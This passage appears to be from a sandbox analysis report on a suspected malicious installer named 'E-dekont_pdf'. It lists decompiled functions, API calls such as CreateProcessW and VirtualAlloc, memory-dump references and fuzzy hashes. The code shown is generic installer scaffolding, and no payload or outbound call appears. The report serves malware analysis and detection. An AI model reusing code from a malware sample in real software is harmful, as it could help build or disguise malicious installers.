                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                              • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                              • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                              • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                                              0x004015ae
                                                                                              0x004015b4
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 66fd2f37e6a0b7586506e148acf598eb3ff60fa90a958fe064a9f4db2acca27a
                                                                                              • Instruction ID: a88e36bebcdf0c9761df9b198431a3a43784d159b2a05bff8a571b36665a5571
                                                                                              • Opcode Fuzzy Hash: 66fd2f37e6a0b7586506e148acf598eb3ff60fa90a958fe064a9f4db2acca27a
                                                                                              • Instruction Fuzzy Hash: 50D01772A08110DBDB11DBA8AA4CB9D73A4AB50368B208537D151F61D0EAB8C9459A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x468238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                              0x00404610
                                                                                              0x00404617
                                                                                              0x00404622
                                                                                              0x00000000
                                                                                              0x00404622
                                                                                              0x00404628

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 9c430a585af9dead0ced1b9af2f98ef41eb9ba8c771f5b32e4223fd7c27f5ad5
                                                                                              • Instruction ID: fa72961503f19785daae9782980f5036fb15b24dbeb52af421932fe0302741c0
                                                                                              • Opcode Fuzzy Hash: 9c430a585af9dead0ced1b9af2f98ef41eb9ba8c771f5b32e4223fd7c27f5ad5
                                                                                              • Instruction Fuzzy Hash: C6C08C70280A00BBDA108B108E04F023394A750701F144528B200E60E0DA74D000C61D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                              0x00403606
                                                                                              0x0040360c

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x470268, 0x28, _a4, "true"); // executed
				return _t2;
			}




                                                                                              0x00404607
                                                                                              0x0040460d

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 5a5c4a952826dcbd4dad185aa274d322bf5ed66f67c501ed72866704e0dbe47d
                                                                                              • Instruction ID: 5a30394b93e65fd8a17989e6605914f9aef953664f6616273aff2242651056bf
                                                                                              • Opcode Fuzzy Hash: 5a5c4a952826dcbd4dad185aa274d322bf5ed66f67c501ed72866704e0dbe47d
                                                                                              • Instruction Fuzzy Hash: E5B01236186A00FBDE914B00DE0DF457E62F764701F008178F345240F0CEB204E4DB08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x446744, _a4); // executed
				return _t2;
			}




                                                                                              0x004045f0
                                                                                              0x004045f6

                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: ae290c5a3a9bb10011a3cf71756f5d6e7621248849e07898e686139ae3f7abb2
                                                                                              • Instruction ID: b8cbf5b22e962298bdca335de0b5dd231d91e1f395c54b46411239c3469517a1
                                                                                              • Opcode Fuzzy Hash: ae290c5a3a9bb10011a3cf71756f5d6e7621248849e07898e686139ae3f7abb2
                                                                                              • Instruction Fuzzy Hash: 1CA002754445009BDE015B51DF0DD057B71E7557057014579A54550034C6314460FB1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F132D14 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F132D14(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6f135024 != 0 && E6F131BC1(_a4) == 0) {
					 *0x6f135030 = _t86;
					if( *0x6f135034 != 0) {
						_t86 =  *0x6f135034;
					} else {
						E6F133250(E6F131C43());
						 *0x6f135034 = _t86;
					}
				}
				_t28 = E6F131C49(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6F131BBB();
					_t67 = _a4;
					_t74 =  *0x6f135028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6f135028 = _t67;
					E6F131C5A();
					_t33 = VirtualAlloc(??, ??, ??, ??); // executed
					 *0x6f135000 = _t33;
					 *0x6f135004 = _t74;
					if( *0x6f135024 != 0 && E6F131BC1( *0x6f135028) == 0) {
						 *0x6f135034 = _t87;
						_t87 =  *0x6f135030;
					}
					_t75 =  *0x6f135028;
					_a4 = _t75;
					 *0x6f135028 =  *((intOrPtr*)(E6F131BBB() + _t75));
					_t37 = E6F131BAD(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6F131C49(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6F131C54() + _a4 + _v8);
							_push(E6F131C64());
							if( *0x6f135024 <= 0 || E6F131BC1(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6f135034;
								_t76 = _t64 + _t78 * 4;
								 *0x6f135034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6f135028 == 0) {
						 *0x6f135034 = 0;
					}
					_push( *0x6f135004);
					E6F132CBF(_t37, _t64, _t76, _a4,  *0x6f135000);
					return _a4;
				}
				_push(E6F131C54() + _a4);
				_t53 = E6F131C60();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6F131CC3();
				_t80 = E6F131CBF();
				_t83 = E6F131C64();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                              0x6f132d24
                                                                                              0x6f132d35
                                                                                              0x6f132d42
                                                                                              0x6f132d56
                                                                                              0x6f132d44
                                                                                              0x6f132d49
                                                                                              0x6f132d4e
                                                                                              0x6f132d4e
                                                                                              0x6f132d42
                                                                                              0x6f132d5f
                                                                                              0x6f132d64
                                                                                              0x6f132d6a
                                                                                              0x6f132dae
                                                                                              0x6f132dae
                                                                                              0x6f132db3
                                                                                              0x6f132db8
                                                                                              0x6f132dbe
                                                                                              0x6f132dc0
                                                                                              0x6f132dc6
                                                                                              0x6f132dd3
                                                                                              0x6f132dd5
                                                                                              0x6f132dda
                                                                                              0x6f132de7
                                                                                              0x6f132dfa
                                                                                              0x6f132e00
                                                                                              0x6f132e06
                                                                                              0x6f132e07
                                                                                              0x6f132e0d
                                                                                              0x6f132e19
                                                                                              0x6f132e1f
                                                                                              0x6f132e27
                                                                                              0x6f132e28
                                                                                              0x6f132e2b
                                                                                              0x6f132e36
                                                                                              0x6f132e38
                                                                                              0x6f132e44
                                                                                              0x6f132e4a
                                                                                              0x6f132e52
                                                                                              0x6f132e7e
                                                                                              0x6f132e7f
                                                                                              0x6f132e85
                                                                                              0x6f132e85
                                                                                              0x6f132e88
                                                                                              0x6f132e89
                                                                                              0x6f132e8c
                                                                                              0x6f132e62
                                                                                              0x6f132e62
                                                                                              0x6f132e63
                                                                                              0x6f132e65
                                                                                              0x6f132e68
                                                                                              0x6f132e6e
                                                                                              0x6f132e71
                                                                                              0x6f132e77
                                                                                              0x6f132e7a
                                                                                              0x6f132e7a
                                                                                              0x6f132e52
                                                                                              0x6f132e36
                                                                                              0x6f132e95
                                                                                              0x6f132e97
                                                                                              0x6f132e97
                                                                                              0x6f132ea1
                                                                                              0x6f132eb0
                                                                                              0x6f132ebe
                                                                                              0x6f132ebe
                                                                                              0x6f132d75
                                                                                              0x6f132d76
                                                                                              0x6f132d7b
                                                                                              0x6f132d7f
                                                                                              0x6f132d84
                                                                                              0x6f132d98
                                                                                              0x6f132d99
                                                                                              0x6f132d9a
                                                                                              0x6f132d9c
                                                                                              0x6f132da1
                                                                                              0x6f132da3
                                                                                              0x6f132da3
                                                                                              0x6f132da6
                                                                                              0x6f132dac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(?), ref: 6F132DD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 002201211e7cd2042eab82f9ed91e86381d83be5605fd5fe921fb4f1c49eea6f
                                                                                              • Instruction ID: 04341af28710b84496ee098abd508f12e192caf61e2ab9c08b3df05bd125137a
                                                                                              • Opcode Fuzzy Hash: 002201211e7cd2042eab82f9ed91e86381d83be5605fd5fe921fb4f1c49eea6f
                                                                                              • Instruction Fuzzy Hash: 17418F77D04725DFDF20AF68DA81B8A37B4EB057E8F20442AE504AB290D736E4719AD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7); // executed
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                              0x00401faa
                                                                                              0x00401faf
                                                                                              0x00401fb5
                                                                                              0x00401fba
                                                                                              0x00401fbe
                                                                                              0x0040292e
                                                                                              0x00401fc4
                                                                                              0x00401fc7
                                                                                              0x00401fca
                                                                                              0x00401fd2
                                                                                              0x00401fe1
                                                                                              0x00401fe3
                                                                                              0x00401fe3
                                                                                              0x00401fd4
                                                                                              0x00401fd8
                                                                                              0x00401fd8
                                                                                              0x00401fd2
                                                                                              0x00401fea
                                                                                              0x00401feb
                                                                                              0x00401feb
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E750,00000000,00000000), ref: 00405C74
                                                                                                • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2972824698-0
                                                                                              • Opcode ID: a73e3e05b7333d1fed781ebcd9da36b5cfbfe9bba80ab46b6ef3e113cc757a3c
                                                                                              • Instruction ID: c4f57583bcc0ac0362ce7bf03689a7cc6a9ffb684fd717776286c5df0fdbd7b6
                                                                                              • Opcode Fuzzy Hash: a73e3e05b7333d1fed781ebcd9da36b5cfbfe9bba80ab46b6ef3e113cc757a3c
                                                                                              • Instruction Fuzzy Hash: C1F09072905112EBDF11BBA599C8DAE76A4DF01318B25453BE102B21E1D77C4E428A5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1312F8 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1312F8() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6f135040 +  *0x6f135040); // executed
				return _t3;
			}




                                                                                              0x6f131302
                                                                                              0x6f131308

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,6F1311C4,-000000A0), ref: 6F131302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
